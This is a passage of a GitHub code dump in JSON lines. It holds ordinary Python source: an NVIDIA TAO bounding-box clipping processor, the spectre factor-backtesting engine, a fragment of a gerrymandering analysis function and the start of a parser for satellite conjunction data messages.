summed_outcome = prec_draws_outcomes[outcome][dist_prec_indices].sum(axis=0)\n unique, counts = np.unique(np.argmax(summed_outcome, axis=0), return_counts=True)\n prefs = {x.split('.')[1].split('_counts')[0]: 0.0 for x in outcomes[outcome]}\n prefs_counts = dict(zip(unique, counts))\n prefs.update(\n {outcomes[outcome][key].split('.')[1].split('_counts')[0]: prefs_counts[key] / len(summed_outcome[0]) for\n key in prefs_counts.keys()})\n dist_draws[outcome] = prefs\n return dist_draws\n","repo_name":"scott-norris-math/GerryWrap","sub_path":"src/run_functions.py","file_name":"run_functions.py","file_ext":"py","file_size_in_byte":25903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"20610523041","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nfrom nvidia_tao_tf1.blocks.multi_source_loader.data_format import CHANNELS_FIRST\nfrom nvidia_tao_tf1.blocks.multi_source_loader.data_format import CHANNELS_LAST\nfrom nvidia_tao_tf1.blocks.multi_source_loader.processors.processor import (\n Processor,\n)\nfrom nvidia_tao_tf1.blocks.multi_source_loader.types import LABEL_OBJECT\nfrom nvidia_tao_tf1.blocks.multi_source_loader.types import SequenceExample\nfrom nvidia_tao_tf1.blocks.multi_source_loader.types import TransformedExample\nfrom nvidia_tao_tf1.core.coreobject import save_args\nfrom nvidia_tao_tf1.core.types import Example\n\n\nclass BboxClipper(Processor):\n \"\"\"Processor for adjusting bounding box labels after cropping.\n\n The following changes need to be made to bounding box labels:\n 1) Labels completely out of the network's input are discarded.\n 2) Labels that are 'half-in, half-out' should have their coordinates clipped to the input\n crop.\n 3) Labels from 2) also should have their ``truncation_type`` updated accordingly.\n \"\"\"\n\n @save_args\n def __init__(self, crop_left=0, crop_right=0, crop_top=0, crop_bottom=0):\n \"\"\"Constructor.\n\n If all of the provided crop coordinates are or 0, this processor will amount to a no-op.\n\n Args:\n crop_left (int): Left-most coordinate of the crop region.\n crop_right (int): Right-most coordinate of the crop region.\n crop_top (int): Top-most coordinate of the crop region.\n crop_bottom (int): Bottom-most coordinate of the crop region.\n\n Raises:\n ValueError: if crop_left > crop_right, or crop_top > crop_bottom.\n \"\"\"\n super(BboxClipper, self).__init__()\n self._no_op = False\n all_crop_coords = {crop_left, crop_right, crop_top, crop_bottom}\n if all_crop_coords == {0}:\n self._no_op = True\n\n if not self._no_op:\n if crop_left >= crop_right or crop_top >= crop_bottom:\n raise ValueError(\n \"Provided crop coordinates result in a non-sensical crop-region.\"\n )\n\n self._crop_left = float(crop_left)\n self._crop_right = float(crop_right)\n self._crop_bottom = float(crop_bottom)\n self._crop_top = float(crop_top)\n\n @property\n def supported_formats(self):\n \"\"\"Data formats supported by this processor.\n\n Returns:\n data_formats (list of 'DataFormat'): Input data formats that this processor supports.\n \"\"\"\n return [CHANNELS_FIRST, CHANNELS_LAST]\n\n def can_compose(self, other):\n \"\"\"\n Determine whether two processors can be composed into a single one.\n\n Args:\n other (Processor): Other processor instance.\n\n Returns:\n (bool): True if this processor knows how to compose the other processor.\n \"\"\"\n return False\n\n def compose(self, other):\n \"\"\"Compose two processors into a single one.\"\"\"\n raise NotImplementedError(\"BboxClipper.compose not supported.\")\n\n def _get_indices_inside_crop(self, coords):\n \"\"\"Get indices for bounding boxes that are at least partially inside the crop region.\n\n Args:\n coords (tf.Tensor): Float tensor of shape (N, 4) where N is the number of bounding\n boxes. Each bbox has coordinates in the order [L, T, R, B].\n\n Returns:\n valid_indices (tf.Tensor): Boolean tensor of shape (N,) indicating which bounding boxes\n in the input are at least partially inside the crop region.\n \"\"\"\n valid_indices = tf.ones(tf.shape(input=coords)[0], dtype=tf.bool)\n\n # False if left-most coordinate is to the right of the crop's region.\n valid_indices = tf.logical_and(\n valid_indices, tf.less(coords[:, 0], self._crop_right)\n )\n # False if right-most coordinate is to the left of the crop's region.\n valid_indices = tf.logical_and(\n valid_indices, tf.greater(coords[:, 2], self._crop_left)\n )\n # False if top-most coordinate is to the bottom of the crop's region.\n valid_indices = tf.logical_and(\n valid_indices, tf.less(coords[:, 1], self._crop_bottom)\n )\n # False if bottom-most coordinate is to the top of the crop's region.\n valid_indices = tf.logical_and(\n valid_indices, tf.greater(coords[:, 3], self._crop_top)\n )\n\n return valid_indices\n\n def _adjust_truncation_type(self, bbox_2d_label):\n \"\"\"Adjust the truncation_type of a label if it is half-in, half-out of the crop.\n\n Args:\n bbox_2d_label (Bbox2DLabel): Label instance for which we will update the\n truncation_type.\n\n Returns:\n adjusted_label (Bbox2DLabel): Adjusted version of ``bbox_2d_label``.\n \"\"\"\n if isinstance(bbox_2d_label.truncation_type, tf.SparseTensor):\n new_coords = bbox_2d_label.vertices.coordinates.values\n # Get LTRB.\n x1, y1, x2, y2 = (\n new_coords[::4],\n new_coords[1::4],\n new_coords[2::4],\n new_coords[3::4],\n )\n\n left_most_in = tf.logical_and(\n tf.greater_equal(x1, self._crop_left),\n tf.less_equal(x1, self._crop_right),\n )\n top_most_in = tf.logical_and(\n tf.greater_equal(y1, self._crop_top),\n tf.less_equal(y1, self._crop_bottom),\n )\n right_most_in = tf.logical_and(\n tf.greater_equal(x2, self._crop_left),\n tf.less_equal(x2, self._crop_right),\n )\n bottom_most_in = tf.logical_and(\n tf.greater_equal(y2, self._crop_top),\n tf.less_equal(y2, self._crop_bottom),\n )\n # Needs adjustment if top-left corner is inside and bottom-right corner is outside, or\n # vice versa.\n half_in_half_out = tf.math.logical_xor(\n tf.logical_and(left_most_in, top_most_in),\n tf.logical_and(right_most_in, bottom_most_in),\n )\n\n old_truncation_type = bbox_2d_label.truncation_type\n new_truncation_type_values = tf.cast(\n tf.logical_or(\n tf.cast(\n old_truncation_type.values, dtype=tf.bool\n ), # Why is this int32??\n half_in_half_out,\n ),\n dtype=tf.int32,\n )\n\n new_truncation_type = tf.SparseTensor(\n values=new_truncation_type_values,\n indices=old_truncation_type.indices,\n dense_shape=old_truncation_type.dense_shape,\n )\n\n return bbox_2d_label._replace(truncation_type=new_truncation_type)\n\n # This corresponds to the case where the `truncation_type` field is not present.\n return bbox_2d_label\n\n def _clip_to_crop_region(self, bbox_2d_label):\n \"\"\"Clip the coordinates to the crop region.\n\n Args:\n bbox_2d_label (Bbox2DLabel): Label instance to clip.\n\n Returns:\n clipped_label (Bbox2DLabel): Clipped version of ``bbox_2d_label``.\n \"\"\"\n input_coords = bbox_2d_label.vertices.coordinates.values\n xmin, ymin, xmax, ymax = (\n input_coords[::4],\n input_coords[1::4],\n input_coords[2::4],\n input_coords[3::4],\n )\n\n xmin = tf.clip_by_value(xmin, self._crop_left, self._crop_right)\n ymin = tf.clip_by_value(ymin, self._crop_top, self._crop_bottom)\n xmax = tf.clip_by_value(xmax, self._crop_left, self._crop_right)\n ymax = tf.clip_by_value(ymax, self._crop_top, self._crop_bottom)\n\n clipped_coords = tf.stack([xmin, ymin, xmax, ymax], axis=1)\n clipped_coords = tf.reshape(clipped_coords, [-1]) # Flatten.\n\n new_coords = tf.SparseTensor(\n values=clipped_coords,\n indices=bbox_2d_label.vertices.coordinates.indices,\n dense_shape=bbox_2d_label.vertices.coordinates.dense_shape,\n )\n new_vertices = bbox_2d_label.vertices._replace(coordinates=new_coords)\n\n return bbox_2d_label._replace(vertices=new_vertices)\n\n def _adjust_bbox_2d_label(self, bbox_2d_label):\n \"\"\"Apply adjustments due to cropping to bounding box labels.\n\n Args:\n bbox_2d_label (Bbox2DLabel): Label instance to apply the adjustments to.\n\n Returns:\n adjusted_label (Bbox2DLabel): Adjusted version of ``bbox_2d_label``.\n \"\"\"\n input_coords = bbox_2d_label.vertices.coordinates.values\n # For convenience, reshape input coordinates.\n input_coords = tf.reshape(input_coords, [-1, 4]) # Order is L, T, R, B.\n\n # First, figure out which ones are completely outside the crop.\n valid_indices = self._get_indices_inside_crop(input_coords)\n\n adjusted_label = bbox_2d_label.filter(valid_indices)\n\n # Now, determine, which ones need to have their coordinates clipped and truncation_type\n # adjusted.\n adjusted_label = self._adjust_truncation_type(adjusted_label)\n adjusted_label = self._clip_to_crop_region(adjusted_label)\n\n return adjusted_label\n\n def process(self, example):\n \"\"\"\n Process an example.\n\n Args:\n example (Example): Example with frames in format specified by data_format.\n\n Returns:\n (Example): Processed example.\n\n Raises:\n ValueError: Since this processor explicitly needs to be applied after transformations\n (if they are present), it does not accept TransformedExample.\n \"\"\"\n if isinstance(example, TransformedExample):\n raise ValueError(\n \"BboxClipper should be applied on labels that have been transformed.\"\n )\n\n if not self._no_op:\n if isinstance(example, (Example, SequenceExample)):\n if LABEL_OBJECT in example.labels:\n example.labels[LABEL_OBJECT] = self._adjust_bbox_2d_label(\n bbox_2d_label=example.labels[LABEL_OBJECT]\n )\n\n return example\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/blocks/multi_source_loader/processors/bbox_clipper.py","file_name":"bbox_clipper.py","file_ext":"py","file_size_in_byte":10428,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"3891210019","text":"from typing import Union, Iterable, Tuple, Dict\nimport warnings\nfrom .factor import BaseFactor\nfrom .filter import FilterFactor, StaticAssets\nfrom .datafactor import ColumnDataFactor, AdjustedColumnDataFactor\nfrom ..plotting import plot_quantile_and_cumulative_returns, plot_chart\nfrom ..data import DataLoader\nfrom ..parallel import ParallelGroupBy\nimport pandas as pd\nimport numpy as np\nimport torch\n\n\nclass OHLCV:\n open = ColumnDataFactor(inputs=('',), should_delay=False)\n high = ColumnDataFactor(inputs=('',))\n low = ColumnDataFactor(inputs=('',))\n close = ColumnDataFactor(inputs=('',))\n volume = ColumnDataFactor(inputs=('',))\n\n\nclass FactorEngine:\n \"\"\"\n Engine for compute factors, used for back-testing and alpha-research both.\n \"\"\"\n\n # friend private:\n\n @property\n def dataframe_(self):\n return self._dataframe\n\n @property\n def loader_(self):\n return self._loader\n\n def get_group_(self, group_name):\n return self._groups[group_name]\n\n def column_to_tensor_(self, data_column) -> torch.Tensor:\n # cache data with column prevent double copying\n if data_column in self._column_cache:\n return self._column_cache[data_column]\n\n series = self._dataframe[data_column]\n data = torch.from_numpy(series.values).to(self._device, non_blocking=True)\n self._column_cache[data_column] = data\n return data\n\n def column_to_parallel_groupby_(self, group_column: str, as_group_name=None):\n if as_group_name is None:\n as_group_name = group_column\n if as_group_name in self._groups:\n return\n\n series = self._dataframe[group_column]\n if series.dtype.name == 'category':\n cat = series.cat.codes\n else:\n cat = series.values\n keys = torch.tensor(cat, device=self._device, dtype=torch.int32)\n self._groups[as_group_name] = ParallelGroupBy(keys)\n\n def revert_(self, data: torch.Tensor, group: str, factor_name: str) -> torch.Tensor:\n return self._groups[group].revert(data, factor_name)\n\n def revert_to_series_(self, data: torch.Tensor, group: str, factor_name: str) -> pd.Series:\n array = self.revert_(data, group, factor_name).cpu()\n return pd.Series(array, index=self._dataframe.index)\n\n def group_by_(self, data: Union[torch.Tensor, pd.Series], group: str) -> torch.Tensor:\n if isinstance(data, torch.Tensor):\n return self._groups[group].split(data)\n elif isinstance(data, pd.Series):\n data = torch.tensor(data.values, device=self._device)\n return self._groups[group].split(data)\n elif isinstance(data, np.ndarray):\n data = torch.tensor(data, device=self._device)\n return self._groups[group].split(data)\n else:\n raise ValueError('Invalid data type, should be tensor or series.')\n\n # private:\n\n def _prepare_tensor(self, start, end, max_backwards):\n # Check cache, just in case, if use some ML techniques, engine may be called repeatedly\n # with same date range.\n if start == self._last_load[0] and end == self._last_load[1] \\\n and max_backwards <= self._last_load[2]:\n return\n self._groups = dict()\n\n # Get data\n df = self._loader.load(start, end, max_backwards).copy()\n # If possible, pre-screen\n if isinstance(self._filter, StaticAssets):\n df = df.loc[(slice(None), self._filter.assets), :]\n if df.shape[0] == 0:\n raise ValueError(\"The assets {} specified by StaticAssets filter, was not found in \"\n \"DataLoader.\".format(self._filter.assets))\n # check history data is insufficient\n df.index = df.index.remove_unused_levels()\n history_win = df.index.levels[0].get_loc(start, 'bfill')\n if history_win < max_backwards:\n warnings.warn(\"Historical data seems insufficient. \"\n \"{} rows of historical data are required, but only {} rows are obtained. \"\n \"It is also possible that `calender_asset` of the loader is not set, \"\n \"some out of trading hours data will cause indexing problems.\"\n .format(max_backwards, history_win),\n RuntimeWarning)\n # post processing data\n if self._align_by_time:\n # since pandas 0.23, MultiIndex reindex is slow, so using a alternative way here,\n # but still very slow.\n # df = df.reindex(pd.MultiIndex.from_product(df.index.levels))\n df = df.unstack(level=1).stack(dropna=False)\n if self.timezone != 'UTC':\n df = df.reset_index('asset').tz_convert(self.timezone)\\\n .set_index(['asset'], append=True)\n\n self._dataframe = df\n self._dataframe_index = [df.index.get_level_values(i) for i in range(len(df.index.levels))]\n\n # asset group\n cat = self._dataframe_index[1].codes\n keys = torch.tensor(cat, device=self._device, dtype=torch.int32)\n self._groups['asset'] = ParallelGroupBy(keys)\n\n # time group prepare\n self.column_to_parallel_groupby_(self._loader.time_category, 'date')\n\n self._column_cache = {}\n if isinstance(self._filter, StaticAssets):\n # if pre-screened, don't cache data, only cache full data.\n self._last_load = [None, None, None]\n else:\n self._last_load = [start, end, max_backwards]\n\n def _compute_and_revert(self, f: BaseFactor, name) -> torch.Tensor:\n stream = None\n if self._device.type == 'cuda' and self._enable_stream:\n stream = torch.cuda.current_stream()\n data = f.compute_(stream)\n return self._groups[f.groupby].revert(data, name)\n\n # public:\n\n def __init__(self, loader: DataLoader) -> None:\n self._loader = loader\n self._dataframe = None\n self._dataframe_index = None\n self._groups = dict()\n self._last_load = [None, None, None]\n self._column_cache = {}\n self._factors = {}\n self._filter = None\n self._device = torch.device('cpu')\n self._enable_stream = False\n self._align_by_time = False\n self.timezone = 'UTC'\n\n @property\n def device(self):\n return self._device\n\n @property\n def dataframe_index(self):\n return self._dataframe_index\n\n def create_tensor(self, group: str, dtype, values, nan_values) -> torch.Tensor:\n return self._groups[group].create(dtype, values, nan_values)\n\n @property\n def align_by_time(self):\n return self._align_by_time\n\n @align_by_time.setter\n def align_by_time(self, enable: bool):\n \"\"\"\n If `enable` is `True`, df index will be the product of 'date' and 'asset'.\n This method is slow, recommended to do it in your DataLoader in advance.\n \"\"\"\n self._align_by_time = enable\n\n def add(self,\n factor: Union[Iterable[BaseFactor], BaseFactor],\n name: Union[Iterable[str], str],\n replace=False) -> None:\n \"\"\"\n Add factor or filter to engine, as a column.\n \"\"\"\n if isinstance(factor, Iterable):\n for i, fct in enumerate(factor):\n self.add(fct, name and name[i] or None)\n else:\n if name in self._factors and not replace:\n raise KeyError('A factor with the name {} already exists.'\n 'please specify a new name by engine.add(factor, new_name)'\n .format(name))\n self._factors[name] = factor\n\n def set_filter(self, factor: Union[FilterFactor, None]) -> None:\n self._filter = factor\n\n def get_filter(self):\n return self._filter\n\n def get_factor(self, name):\n return self._factors[name]\n\n @property\n def factors(self):\n return self._factors.copy()\n\n def clear(self):\n self.remove_all_factors()\n self.set_filter(None)\n\n def empty_cache(self):\n self._last_load = [None, None, None]\n self._column_cache = {}\n self._groups = dict()\n self._dataframe = None\n self._dataframe_index = None\n\n def remove_all_factors(self) -> None:\n self._factors = {}\n\n def to_cuda(self, enable_stream=False) -> None:\n \"\"\"\n Set enable_stream to True allows pipeline branches to calculation simultaneously.\n However, this will lead to more VRAM usage and may affect performance.\n \"\"\"\n self._device = torch.device('cuda')\n self._enable_stream = enable_stream\n self.empty_cache()\n\n def to_cpu(self) -> None:\n self._device = torch.device('cpu')\n self.empty_cache()\n\n def test_lookahead_bias(self, start, end):\n \"\"\"Check all factors, if there are look-ahead bias\"\"\"\n start, end = pd.to_datetime(start, utc=True), pd.to_datetime(end, utc=True)\n # get results\n df_expected = self.run(start, end)\n # modify future data\n dt_index = self._dataframe[start:].index.get_level_values(0).unique()\n mid = int(len(dt_index) / 2)\n mid_left = dt_index[mid-1]\n mid_right = dt_index[mid]\n length = self._dataframe.loc[mid_right:].shape[0]\n for col in self._loader.ohlcv:\n self._dataframe.loc[mid_right:, col] = np.random.randn(length)\n self._column_cache = {}\n # hack to disable reload _dataframe\n max_backwards = max([f.get_total_backwards_() for f in self._factors.values()])\n if self._filter:\n max_backwards = max(max_backwards, self._filter.get_total_backwards_())\n self._last_load = [start, end, max_backwards]\n # check if results are consistent\n df = self.run(start, end)\n # clean\n self.empty_cache()\n\n try:\n pd.testing.assert_frame_equal(df_expected[:mid_left], df[:mid_left])\n except AssertionError:\n raise RuntimeError('A look-ahead bias was detected, please check your factors code')\n return 'No assertion raised.'\n\n def _run(self, start, end, delay_factor):\n if len(self._factors) == 0:\n raise ValueError('Please add at least one factor to engine, then run again.')\n\n delays = {col for col, fct in self._factors.items() if fct.should_delay()}\n if not delay_factor and len(delays) > 0:\n warnings.warn(\"Warning!! delay_factor is set to False, \"\n \"but {} factors uses data that is only available \"\n \"after the market is closed.\".format(str(delays)),\n RuntimeWarning)\n delays = {}\n\n # make columns to data factors.\n if self._loader.ohlcv is not None:\n OHLCV.open.inputs = (self._loader.ohlcv[0], self._loader.adjustment_multipliers[0])\n OHLCV.high.inputs = (self._loader.ohlcv[1], self._loader.adjustment_multipliers[0])\n OHLCV.low.inputs = (self._loader.ohlcv[2], self._loader.adjustment_multipliers[0])\n OHLCV.close.inputs = (self._loader.ohlcv[3], self._loader.adjustment_multipliers[0])\n OHLCV.volume.inputs = (self._loader.ohlcv[4], self._loader.adjustment_multipliers[1])\n\n # shift factors if necessary\n filter_ = self._filter\n if filter_ and filter_.should_delay() and delay_factor:\n filter_ = filter_.shift(1)\n factors = {col: col in delays and fct.shift(1) or fct\n for col, fct in self._factors.items()}\n\n # calculate how much historical data is needed\n max_backwards = max([f.get_total_backwards_() for f in factors.values()])\n if filter_:\n max_backwards = max(max_backwards, filter_.get_total_backwards_())\n\n # copy data to tensor\n self._prepare_tensor(start, end, max_backwards)\n\n # clean up before start (may be keyboard interrupted)\n if filter_:\n filter_.clean_up_()\n for f in factors.values():\n f.clean_up_()\n\n # some pre-work\n if filter_:\n filter_.pre_compute_(self, start, end)\n for f in factors.values():\n f.pre_compute_(self, start, end)\n\n # schedule possible gpu work first\n results = {col: self._compute_and_revert(fct, col) for col, fct in factors.items()}\n shifted_mask = None\n if filter_:\n shifted_mask = self._compute_and_revert(filter_, 'filter')\n\n # do clean up again\n if filter_:\n filter_.clean_up_()\n for f in factors.values():\n f.clean_up_()\n\n return results, shifted_mask, len(delays) > 0\n\n def run(self, start: Union[str, pd.Timestamp], end: Union[str, pd.Timestamp],\n delay_factor=True) -> pd.DataFrame:\n \"\"\"\n Compute factors and filters, return a df contains all.\n \"\"\"\n start, end = pd.to_datetime(start, utc=True), pd.to_datetime(end, utc=True)\n\n results, shifted_mask, delayed = self._run(start, end, delay_factor)\n # do cpu work and synchronize will automatically done by torch\n ret = pd.DataFrame(index=self._dataframe.index.copy())\n ret = ret.assign(**{col: t.cpu().numpy() for col, t in results.items()})\n if shifted_mask is not None:\n ret = ret[shifted_mask.cpu().numpy()]\n\n # if any factors delayed, return df also should be delayed\n if delayed:\n index = ret.index.levels[0]\n start_ind = index.get_loc(start, 'bfill')\n if (start_ind + 1) >= len(index):\n raise ValueError('There is no data between start and end.')\n start = index[start_ind + 1]\n return ret.loc[start:]\n\n def run_raw(self, start: Union[str, pd.Timestamp], end: Union[str, pd.Timestamp],\n delay_factor=True) -> Dict[str, torch.Tensor]:\n \"\"\"\n Compute factors and filters, return a dict contains factor_name = torch.Tensor\n \"\"\"\n start, end = pd.to_datetime(start, utc=True), pd.to_datetime(end, utc=True)\n\n results, shifted_mask, delayed = self._run(start, end, delay_factor)\n\n index = self._dataframe.index.levels[0]\n start_ind = index.get_loc(start, 'bfill')\n if delayed: # if any factors delayed, return df also should be delayed\n start_ind += 1\n if start_ind >= len(index):\n raise ValueError('There is no data between start and end.')\n if shifted_mask is not None:\n shifted_mask = shifted_mask[start_ind:]\n results = {k: v[start_ind:][shifted_mask] for k, v in results.items()}\n else:\n results = {k: v[start_ind:] for k, v in results.items()}\n return results\n\n def get_factors_raw_value(self):\n stream = None\n if self._device.type == 'cuda':\n stream = torch.cuda.current_stream()\n return {c: f.compute_(stream) for c, f in self._factors.items()}\n\n def get_price_matrix(self,\n start: Union[str, pd.Timestamp],\n end: Union[str, pd.Timestamp],\n prices: ColumnDataFactor = OHLCV.close,\n ) -> pd.DataFrame:\n \"\"\"\n Get the price data for Factor Return Analysis.\n :param start: same as run\n :param end: should be longer than the `end` time of `run`, for forward returns calculations.\n :param prices: prices data factor. If you traded at the opening, you should set it\n to OHLCV.open.\n \"\"\"\n factors_backup = self._factors\n self._factors = {'price': AdjustedColumnDataFactor(prices)}\n\n # get tickers first\n assets = None\n if self._filter is not None:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n assets_ret = self.run(start, end, delay_factor=False)\n assets = assets_ret.index.get_level_values(1).unique()\n\n filter_backup = self._filter\n self._filter = StaticAssets(assets)\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n ret = self.run(start, end, delay_factor=False)\n self._factors = factors_backup\n self._filter = filter_backup\n\n ret = ret['price'].unstack(level=[1])\n return ret\n\n def plot_chart(self, start, end, trace_types=None, styles=None, delay_factor=True,\n inline=True):\n \"\"\"\n Plotting common stock price chart for researching.\n :param start: same as engine.run()\n :param end: same as engine.run()\n :param delay_factor: same as engine.run()\n :param trace_types: dict(factor_name=plotly_trace_type), default is 'Scatter'\n :param styles: dict(factor_name=plotly_trace_styles)\n :param inline: display plot immediately\n\n Usage::\n\n engine = factors.FactorEngine(loader)\n engine.timezone = 'America/New_York'\n engine.set_filter(factors.StaticAssets({'NVDA', 'MSFT'}))\n engine.add(factors.MA(20), 'MA20')\n engine.add(factors.RSI(), 'RSI')\n engine.to_cuda()\n engine.plot_chart('2017', '2018', styles={\n 'MA20': {\n 'line': {'dash': 'dash'}\n },\n 'RSI': {\n 'yaxis': 'y3',\n 'line': {'width': 1}\n }\n })\n\n \"\"\"\n df = self.run(start, end, delay_factor)\n figs = plot_chart(self._dataframe, self.loader_.ohlcv, df, trace_types=trace_types,\n styles=styles, inline=inline)\n return figs, df\n\n def full_run(self, start, end, trade_at='close', periods=(1, 4, 9),\n quantiles=5, filter_zscore=20, demean=True, preview=True\n ) -> Tuple[pd.DataFrame, pd.DataFrame]:\n \"\"\"\n Return this:\n | \t | \t| Returns | factor_name \t|\n |date\t |asset\t|10D\t |factor\t |factor_quantile\t|\n |---------------------------|-------|-----------|-----------|-------------------|\n |2014-01-08 00:00:00+00:00\t|ARNC\t|0.070159\t|0.215274\t|5 |\n | |BA\t |-0.038556\t|-1.638784\t|1 |\n For alphalens analysis, you can use this:\n factor_data = full_run_return[['factor_name', 'Returns']].droplevel(0, axis=1)\n al.tears.create_returns_tear_sheet(factor_data)\n :param str, pd.Timestamp start: Factor analysis start time\n :param str, pd.Timestamp end: Factor analysis end time\n :param trade_at: Which price for forward returns. 'open', or 'close.\n If is 'current_close', same as run engine with delay_factor=False,\n Be sure that no any high,low,close data is used in factor, otherwise will\n cause lookahead bias.\n :param periods: Forward return periods\n :param quantiles: Number of quantile\n :param filter_zscore: Drop extreme factor return, for stability of the analysis.\n :param demean: Whether the factor is converted into a hedged weight: sum(weight) = 0\n :param preview: Display a preview chart of the result\n \"\"\"\n factors = self._factors.copy()\n universe = self.get_filter()\n\n column_names = {}\n # add quantile factor of all factors\n for c, f in factors.items():\n self.add(f.quantile(quantiles, mask=universe), c + '_q_')\n self.add(f.to_weight(mask=universe, demean=demean), c + '_w_')\n column_names[c] = (c, 'factor')\n column_names[c + '_q_'] = (c, 'factor_quantile')\n column_names[c + '_w_'] = (c, 'factor_weight')\n\n # add the rolling returns of each period, use AdjustedColumnDataFactor for best performance\n shift = -1\n inputs = (AdjustedColumnDataFactor(OHLCV.close),)\n if trade_at == 'open':\n inputs = (AdjustedColumnDataFactor(OHLCV.open),)\n elif trade_at == 'current_close':\n shift = 0\n from .basic import Returns\n for n in periods:\n # Different: returns here diff by bar, which alphalens diff by time\n ret = Returns(win=n + 1, inputs=inputs).shift(-n + shift)\n mask = universe\n if filter_zscore is not None:\n # Different: The zscore here contains all backward data which alphalens not counted.\n zscore_factor = ret.zscore(groupby='asset', mask=universe)\n zscore_filter = zscore_factor.abs() <= filter_zscore\n if mask is not None:\n mask = mask & zscore_filter\n else:\n mask = zscore_filter\n self.add(ret.filter(mask), str(n) + '_r_')\n else:\n self.add(ret, str(n) + '_r_')\n self.add(ret.demean(mask=mask), str(n) + '_d_')\n\n # run and get df\n factor_data = self.run(start, end, trade_at != 'current_close')\n self._factors = factors\n factor_data.index = factor_data.index.remove_unused_levels()\n # factor_data.sort_index(inplace=True) # 140 ms\n assert len(factor_data.index.levels[0]) > max(periods) - shift, \\\n 'No enough data for forward returns, please expand the end date'\n last_date = factor_data.index.levels[0][-max(periods) + shift - 1]\n factor_data = factor_data.loc[:last_date]\n\n # infer freq\n delta = min(factor_data.index.levels[0][1:] - factor_data.index.levels[0][:-1])\n unit = delta.resolution_string\n freq = int(delta / pd.Timedelta(1, unit))\n # change columns name\n period_cols = {n: str(n * freq) + unit for n in periods}\n for n, period_col in period_cols.items():\n column_names[str(n) + '_r_'] = ('Returns', period_col)\n column_names[str(n) + '_d_'] = ('Demeaned', period_col)\n new_cols = pd.MultiIndex.from_tuples([column_names[c] for c in factor_data.columns])\n factor_data.columns = new_cols\n factor_data.sort_index(axis=1, inplace=True)\n\n # mean return, return std err\n mean_return = pd.DataFrame(columns=pd.MultiIndex.from_arrays([[], []]))\n for fact_name, _ in factors.items():\n group = [(fact_name, 'factor_quantile'), 'date']\n grouped_mean = factor_data[['Demeaned', fact_name]].groupby(group).agg('mean')\n for n, period_col in period_cols.items():\n demean_col = ('Demeaned', period_col)\n mean_col = (fact_name, period_col)\n mean_return[mean_col] = grouped_mean[demean_col]\n mean_return.index.set_names('quantile', level=0)\n mean_return = mean_return.groupby(level=0).agg(['mean', 'sem'])\n mean_return.sort_index(axis=1, inplace=True)\n\n # plot\n if preview:\n plot_quantile_and_cumulative_returns(factor_data, mean_return)\n\n return factor_data, mean_return\n","repo_name":"Heerozh/spectre","sub_path":"spectre/factors/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":23232,"program_lang":"python","lang":"en","doc_type":"code","stars":479,"dataset":"github-code","pt":"53"}
+{"seq_id":"13059378417","text":"\"\"\"CDM module.\n\nThis module loads CDMS either from a .pdf-file or from the SQL database.\n\nExample\n-------\n\nNotes\n-----\n\nAttributes\n----------\n\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport fitz # this is pymupdf\nfrom datetime import datetime, timezone\nimport mysql.connector as sql\nfrom sqlalchemy import create_engine\nfrom astropy import units as u\n\n\nclass CDM:\n \"\"\"\n A Conjunction Data Message.\n Further information: https://public.ccsds.org/Pubs/508x0b1e2c2.pdf\n \"\"\"\n\n\n def __init__(self):\n \"\"\"\n \n \"\"\"\n # self.objectA = SatObject(\"ObjectA\")\n # self.objectB = SatObject(\"ObjectB\")\n \n\n def load_cdm_from_pdf(self, filename):\n \"\"\"\n Loads a CDM from a .pdf file.\n \"\"\"\n doc = fitz.open(filename) # open document\n for page in doc: # iterate the document pages\n text = str(page.get_text().encode(\"utf8\")) # get plain text (is in UTF-8)\n # TODO: add test for more than one pdf page\n \n lines = text.split('\\\\n')\n\n self.generation_date = datetime.strptime(lines[2].rpartition(\": \")[2].replace(\" \",\"\"),'%Y/%m/%d%H:%M').replace(tzinfo=timezone.utc)\n # print(generation_date)\n\n self.ccsds_cdm_vers = lines[5].rpartition(\":\")[2].strip()\n # print(ccsds_cdm_vers)\n self.creation_date = datetime.strptime(lines[6].rpartition(\": \")[2].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S').replace(tzinfo=timezone.utc)\n # print(creation_date)\n self.originator = lines[7].rpartition(\":\")[2].strip()\n # print(originator)\n self.message_for = lines[8].rpartition(\":\")[2].strip()\n # print(message_for)\n self.message_id = lines[9].rpartition(\":\")[2].strip()\n # print(message_id)\n\n self.tca = datetime.strptime(lines[11].split(\": \")[1].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc)\n # print(tca)\n self.miss_distance = float(lines[12].split(\": \")[1].strip())\n # print(miss_distance)\n self.relative_speed = float(lines[13].split(\": \")[1].strip())\n # print(relative_speed)\n rel_position_R = float(lines[14].split(\": \")[1].strip())\n # print(relative_position_R)\n rel_position_T = float(lines[15].split(\": \")[1].strip())\n # print(relative_position_T)\n rel_position_N = float(lines[16].split(\": \")[1].strip())\n # print(relative_position_N)\n self.rel_position_RTN = np.array([[rel_position_R],[rel_position_T],[rel_position_N]])\n self.collision_prob = float(lines[17].split(\": \")[1].strip())\n # print(collision_prob)\n self.collision_prob_method = lines[18].split(\": \")[1].strip()\n # print(collision_prob_method)\n\n line = lines[22].split(\": \")[1].strip().split(\" \")\n self.object_designator = [x for x in line if x]\n # print(object_designator)\n line = lines[23].split(\": \")[1].strip().split(\" \")\n self.object_name = [x for x in line if x]\n # print(object_name)\n line = lines[24].split(\": \")[1].strip().split(\" \")\n self.itn_designator = [x for x in line if x]\n # print(itn_designator)\n line = lines[25].split(\": \")[1].strip().split(\" \")\n self.object_type = [x for x in line if x]\n # print(object_type)\n line = lines[26].split(\": \")[1].strip().split(\" \")\n self.operator_organization = [x for x in line if x]\n # print(operator_organization)\n line = lines[27].split(\": \")[1].strip().split(\" \")\n self.ephemeris_name = [x for x in line if x]\n # print(ephemeris_name)\n line = lines[28].split(\": \")[1].strip().split(\" \")\n self.maneuverable = [x for x in line if x]\n # print(maneuverable)\n line = lines[29].split(\": 